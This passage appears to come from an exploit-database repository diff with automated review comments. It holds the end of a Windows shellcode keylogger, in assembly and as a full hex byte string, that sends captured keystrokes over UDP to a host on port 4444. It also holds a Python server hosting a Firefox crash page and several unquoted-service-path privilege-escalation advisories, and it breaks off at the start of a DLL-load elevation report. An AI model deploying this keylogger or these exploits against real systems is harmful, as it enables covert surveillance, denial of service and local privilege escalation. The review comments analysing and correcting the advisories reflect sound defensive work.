push eax ; 0000011A 50
push dword 0x56a2b5f0 ; 0000011B 68F0B5A256
call ebp ; 00000120 FFD5
loc_122h:
push dword 0x3233 ; 00000122 6833320000
push dword 0x72657375 ; 00000127 6875736572
push esp ; 0000012C 54
push dword 0x726774c ; 0000012D 684C772607
call ebp ; 00000132 FFD5
push dword 0x657461 ; 00000134 6861746500
push dword 0x74537965 ; 00000139 6865795374
push dword 0x4b746547 ; 0000013E 684765744B
push esp ; 00000143 54
push eax ; 00000144 50
push dword 0x7802f749 ; 00000145 6849F70278
call ebp ; 0000014A FFD5
push esi ; 0000014C 56
push edi ; 0000014D 57
push eax ; 0000014E 50
xor ecx,ecx ; 0000014F 31C9
mov esi,ecx ; 00000151 89CE
mov cl,0x8 ; 00000153 B108
loc_155h:
push esi ; 00000155 56
loop loc_155h ; 00000156 E2FD
loc_158h:
xor ecx,ecx ; 00000158 31C9
xor esi,esi ; 0000015A 31F6
push byte +0x8 ; 0000015C 6A08
push dword 0xe035f044 ; 0000015E 6844F035E0
call ebp ; 00000163 FFD5
loc_165h:
mov eax,esi ; 00000165 89F0
cmp al,0xff ; 00000167 3CFF
jnc loc_158h ; 00000169 73ED
inc esi ; 0000016B 46
push esi ; 0000016C 56
call dword [esp+0x24] ; 0000016D FF542424
mov edx,esi ; 00000171 89F2
xor ecx,ecx ; 00000173 31C9
mov cl,0x80 ; 00000175 B180
and eax,ecx ; 00000177 21C8
xor ecx,ecx ; 00000179 31C9
cmp eax,ecx ; 0000017B 39C8
jnz loc_18fh ; 0000017D 7510
xor edx,edx ; 0000017F 31D2
mov ecx,edx ; 00000181 89D1
mov eax,esi ; 00000183 89F0
mov cl,0x20 ; 00000185 B120
div ecx ; 00000187 F7F1
btr [esp+eax*4],edx ; 00000189 0FB31484
jmp short loc_165h ; 0000018D EBD6
loc_18fh:
xor edx,edx ; 0000018F 31D2
mov ecx,edx ; 00000191 89D1
mov eax,esi ; 00000193 89F0
mov cl,0x20 ; 00000195 B120
div ecx ; 00000197 F7F1
bt [esp+eax*4],edx ; 00000199 0FA31484
jc loc_165h ; 0000019D 72C6
xor edx,edx ; 0000019F 31D2
mov ecx,edx ; 000001A1 89D1
mov eax,esi ; 000001A3 89F0
mov cl,0x20 ; 000001A5 B120
div ecx ; 000001A7 F7F1
bts [esp+eax*4],edx ; 000001A9 0FAB1484
push esi ; 000001AD 56
push byte +0x10 ; 000001AE 6A10
push dword [esp+0x30] ; 000001B0 FF742430
push byte +0x0 ; 000001B4 6A00
push byte +0x1 ; 000001B6 6A01
lea ecx,[esp+0x10] ; 000001B8 8D4C2410
push ecx ; 000001BC 51
push dword [esp+0x3c] ; 000001BD FF74243C
push dword 0xdf5c9d75 ; 000001C1 68759D5CDF
call ebp ; 000001C6 FFD5
lea esp,[esp+0x4] ; 000001C8 8D642404
jmp short loc_158h ; 000001CC EB8A
loc_1ceh:
call dword loc_b2h ; 000001CE E8DFFEFFFF
db "www.example.com",0
loc_1e3h:
call dword loc_dfh
db "4444",0
;"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b"
;"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c"
;"\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
;"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20"
;"\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
;"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
;"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
;"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
;"\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
;"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00"
;"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x10\xe9\x1c\x01"
;"\x00\x00\x68\xa9\x28\x34\x80\xff\xd5\x8d\x70\x1c\x87\xf4\x58\x87"
;"\xe6\x89\xc6\x68\x6c\x6c\x00\x00\x68\x72\x74\x2e\x64\x68\x6d\x73"
;"\x76\x63\x54\x68\x4c\x77\x26\x07\xff\xd5\xe9\x04\x01\x00\x00\x68"
;"\x1f\xcd\x1e\x0d\xff\xd5\x86\xe0\xc1\xc8\x10\x40\x40\x56\x50\x89"
;"\xe6\x31\xc0\x50\x50\x50\x50\x40\x40\x50\x50\x68\xea\x0f\xdf\xe0"
;"\xff\xd5\x89\xc7\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
;"\xc0\x74\x0f\xff\x4e\x08\x75\xec\x31\xc0\x50\x68\xf0\xb5\xa2\x56"
;"\xff\xd5\x68\x33\x32\x00\x00\x68\x75\x73\x65\x72\x54\x68\x4c\x77"
;"\x26\x07\xff\xd5\x68\x61\x74\x65\x00\x68\x65\x79\x53\x74\x68\x47"
;"\x65\x74\x4b\x54\x50\x68\x49\xf7\x02\x78\xff\xd5\x56\x57\x50\x31"
;"\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08\x68\x44"
;"\xf0\x35\xe0\xff\xd5\x89\xf0\x3c\xff\x73\xed\x46\x56\xff\x54\x24"
;"\x24\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x56\x6a\x10"
;"\xff\x74\x24\x30\x6a\x00\x6a\x01\x8d\x4c\x24\x10\x51\xff\x74\x24"
;"\x3c\x68\x75\x9d\x5c\xdf\xff\xd5\x8d\x64\x24\x04\xeb\x8a\xe8\xdf"
;"\xfe\xff\xff\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63"
;"\x6f\x6d\x00\xe8\xf7\xfe\xff\xff\x34\x34\x34\x34\x00"
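Review bot: The `; Tested on` line lists `10(x86_64)`, but the code is 32-bit throughout (`mov edx,[fs:eax+0x30]`, 32-bit registers and pushes), so on a 64-bit Windows it was presumably exercised inside a 32-bit (WOW64) process; the header should say so, e.g. `; Tested on: Windows 7 (x86), 8.1 (x86), 10 x64 (32-bit process)`. The `; Note:` sentence is garbled ("it will write to single byte payload udp packets to host"); the `push byte +0x1` length argument before the `sendto` hash shows the intended statement is `; Note: each captured key code is sent as a single-byte UDP datagram`. "msdn.microsoft.com website" in the following line reads as an unfinished reference and could name the page ("Virtual-Key Codes").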

147
platforms/windows/dos/40536.py Executable file

@ -0,0 +1,147 @@
'''
#Hi guys
#Title: Firefox 49.0.1 crash Denial of Service
#Date: 15 Oct 2016
#Author: sultan albalawi
#video: https://www.facebook.com/pentest3/videos/vb.100012552940568/199310163830747/?type=2&theater
#Tested on:win7
#Open link in firefox
#Double click on the Click You will see the report that there are crach
#thanks
.........................................................................
'''
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import subprocess,string
host='192.168.100.3'
port=6060
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
print "please wait ...."
i=1
while i <= 4120:
i+=1
ban+=string.ascii_uppercase*250
ban=ban
class Req(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write('''<html>
<head>
<title>Firefox 49.0.1 Vulnerability</title>
</br>
<h1>Firefox 49.0.1 Vulnerability <h1>
<h1>\x41\x75\x74\x68\x6f\x72\x3a\x20\x53\x75\x6c\x74\x61\x6e\x2d\x61\x6c\x62\x61\x6c\x61\x77\x69<h1>
<h1>\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n<h1>
</div>'''+''+'''</body>
<script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 50000; i++) {
buffer += "\x41";
}
var buffer2 = buffer;
for (i = 0; i < 5000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>'helo firefox'<a href="javascript:ex();">CLICK
</a></body></html>''')
class runHTTP(HTTPServer):
def __init__(self,host,port):
ipadd=(host,port)
HTTPServer.__init__(self,ipadd,Req)
def createfile():
global filecreate
filecreate = "Firefox.dat"
open(filecreate, "wb").write(ban)
print filecreate
createfile()
def start():
global filecreate
ser=runHTTP(host,port)
print "http://{}:{}/{}".format(host,port,filecreate)
ser.serve_forever()
start()
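Review bot: The crash this script triggers is plain memory exhaustion rather than a memory-safety defect: `ex()` at lines 1671-1681 appends a 50,000-character string to itself 5,000 times (about 250 million UTF-16 code units, roughly 500 MB before the temporaries) and assigns it to `document.title`, so the advisory header should say out-of-memory abort, which any page can provoke, instead of implying a Firefox 49.0.1-specific bug. The ~26 MB `ban` buffer built at lines 1653-1655 and written to `Firefox.dat` at 1688-1693 is never served — `do_GET` ignores the request path and always returns the inline HTML — so the printed `/Firefox.dat` URL is misleading and the loop, the no-op `ban=ban`, and the unclosed `open(filecreate, "wb").write(ban)` can go. `host` is hard-coded to `192.168.100.3` and `subprocess` is imported but unused; take the bind address from `sys.argv` (or bind `0.0.0.0`) so the script runs anywhere.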


@ -0,0 +1,32 @@
#########################################################################
# Exploit Title: Wondershare PDFelement Unquoted Service Path Privilege
Escalation
# Date: 10/14/2016
# Author: Saeed Hasanzadeh (Net.Hun73r)
# Vendor Homepage: https://www.wondershare.com/
# Software Link:
http://download.wondershare.com/inst/pdfelement_setup_full1042.exe
#version : 5.2.9
# Tested on: Windows 7
##########################################################################
Wondershare PDFelement installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the
service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc WsAppService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WsAppService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Wondershare\WAF\2.2.3.2\WsAppService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Application Framework Service
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
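Review bot: The advisory never shows that the alternative path is writable by the user it claims can exploit this. For `C:\Program Files\Wondershare\WAF\2.2.3.2\WsAppService.exe` (line 1728) the only space is inside "Program Files", so CreateProcess tries exactly one other candidate, `C:\Program.exe`, and on a default Windows 7 install Authenticated Users may create folders in the drive root but not files; an `icacls C:\` listing, or an explicit statement that a loosened root ACL is assumed, should accompany the `sc qc` output, otherwise this is a hardening finding rather than a local privilege escalation. The remediation is also missing and is one command: `sc config WsAppService binPath= "\"C:\Program Files\Wondershare\WAF\2.2.3.2\WsAppService.exe\""`.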


@ -0,0 +1,43 @@
# Exploit Title: Graylog Collector Service Path Privilege Escalation
# Date: 10/14/2016
# Exploit Author: Joey Lane
# Software Link: https://github.com/Graylog2/collector
# Version: 0.4.2
# Tested on: Windows Server 2012 R2
Graylog Collector installs as a service with an unquoted service path. If
the user installs this service in a directory containing a space, this will
create a privilege escalation vulnerability. To properly exploit this
vulnerability, a local attacker can insert an executable file in the path
of the service. Rebooting the system or restarting the service will run
the malicious executable with elevated privileges.
This was tested on version 0.4.2, but may affect other versions as well.
---------------------------------------------------------------------------
C:\sc qc GraylogCollector
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GraylogCollector
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\graylog collector\bin\windows\graylog-collector-service-x86.exe //RS//GraylogCollector
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Graylog Collector (GraylogCollector)
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"graylog.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
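Review bot: The example at lines 1767-1769 asserts that `graylog.exe` can simply be placed in `C:\`, but on a default Windows Server 2012 R2 install Authenticated Users hold only the create-subfolder right on the drive root, not create-file, so an unprivileged user cannot drop that file; the advisory needs an `icacls C:\` check or a note that it assumes a non-default root ACL before calling this a privilege escalation. Because the `//RS//GraylogCollector` argument on line 1758 is split at spaces like the rest of the command line, `C:\graylog.exe` is indeed the single candidate path, which is worth stating explicitly. Remediation is missing: install under a path without spaces, or run `sc config GraylogCollector binPath= "\"C:\graylog collector\bin\windows\graylog-collector-service-x86.exe\" //RS//GraylogCollector"`.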


@ -0,0 +1,32 @@
#########################################################################
# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path
Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=4
#version : build 16.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
NETGATE Registry Cleaner installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc NGRegClnSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NGRegClnSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Registry
Cleaner\RegistryCleanerSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Registry Cleaner Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
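Review bot: The `sc qc` output on lines 1797-1798 is only half the evidence: the two paths CreateProcess tries before the real binary are `C:\Program.exe` and `C:\Program Files\NETGATE\Registry.exe`, and on a default Windows 7 install neither the drive root (file creation denied to Authenticated Users) nor `C:\Program Files\NETGATE` (Administrators only) is writable by a standard user unless the installer loosened the ACL. Add `icacls "C:\Program Files\NETGATE"` output showing a writable entry for Users, or soften the wording from privilege escalation to hardening issue. The fix belongs in the advisory too: `sc config NGRegClnSrv binPath= "\"C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe\""`.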


@ -0,0 +1,47 @@
#########################################################################
# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path
Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=11
#version : build 23.0.305 (Latest)
# Tested on: Windows 7
##########################################################################
AMITI Antivirus installs two service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc AmitiAvSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AmitiAvSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti
Antivirus\AmitiAntivirusSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc AmitiAvHealth
[SC] QueryServiceConfig SUCCESS
----------------------------------------------------
SERVICE_NAME: AmitiAvHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti
Antivirus\AmitiAntivirusHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
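Review bot: Both services (lines 1831-1832 and 1845-1846) share the prefix `C:\Program Files\NETGATE\Amiti Antivirus\`, so the files an attacker would have to plant are `C:\Program.exe` or `C:\Program Files\NETGATE\Amiti.exe`, and the advisory gives no ACL evidence that a standard user can create either on Windows 7, where the drive root refuses file creation and Program Files is administrator-writable by default. An `icacls "C:\Program Files\NETGATE"` listing is the check a reader needs before treating this as exploitable. The remediation, quoting the paths with `sc config AmitiAvSrv binPath= "\"C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe\""` and the same for `AmitiAvHealth`, should be stated.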


@ -0,0 +1,31 @@
#########################################################################
# Exploit Title: NETGATE Data Backup Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=5
#version : build 3.0.605 (Latest)
# Tested on: Windows 7
##########################################################################
NETGATE Data Backup installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc NGDatBckpSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NGDatBckpSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Data
Backup\DataBackupSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Data Backup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
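Review bot: The exploitability claim rests on a standard user being able to create `C:\Program.exe` or `C:\Program Files\NETGATE\Data.exe`, the two candidates tried before the binary on lines 1878-1879, and the advisory does not show the directory ACLs that would allow it; on a default Windows 7 install both locations are protected, so an `icacls` listing of `C:\Program Files\NETGATE` is needed to support the privilege-escalation wording. The remediation `sc config NGDatBckpSrv binPath= "\"C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe\""` is missing.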


@ -0,0 +1,45 @@
#########################################################################
# Exploit Title: Spy Emergency Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.spy-emergency.com/
# Software Link: http://www.spy-emergency.com/download/download.php?id=1
#version : build 23.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
Spy Emergency installs two service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc SpyEmrgHealth
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyEmrgHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy
Emergency\SpyEmergencyHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spy Emergency Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
------------------------------------------------------------------
C:\>sc qc SpyEmrgSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyEmrgSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy
Emergency\SpyEmergencySrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spy Emergency Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
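Review bot: The two services on lines 1910-1911 and 1924-1925 resolve to the same candidate files, `C:\Program.exe` and `C:\Program Files\NETGATE\Spy.exe`, and the advisory stops at `sc qc` without showing that either can be created by a non-administrator on Windows 7, where by default neither can. Add the `icacls "C:\Program Files\NETGATE"` output, or state the assumption, and include the fix: `sc config SpyEmrgSrv binPath= "\"C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe\""` and the equivalent for `SpyEmrgHealth`.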

192
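--- a/platforms/windows/local/40562.cpp
+++ b/platforms/windows/local/40562.cpp
@@ -0,0 +1,192 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=887
+Windows: Diagnostics Hub DLL Load EoP
+Platform: Windows 10 10586, not tested 8.1 Update 2 or Windows 7
+Class: Elevation of Privilege
+Summary:
+The fix for CVE-2016-3231 is insufficient to prevent a normal user specifying an insecure agent path leading to arbitrary DLL loading at system privileges.
+Description:
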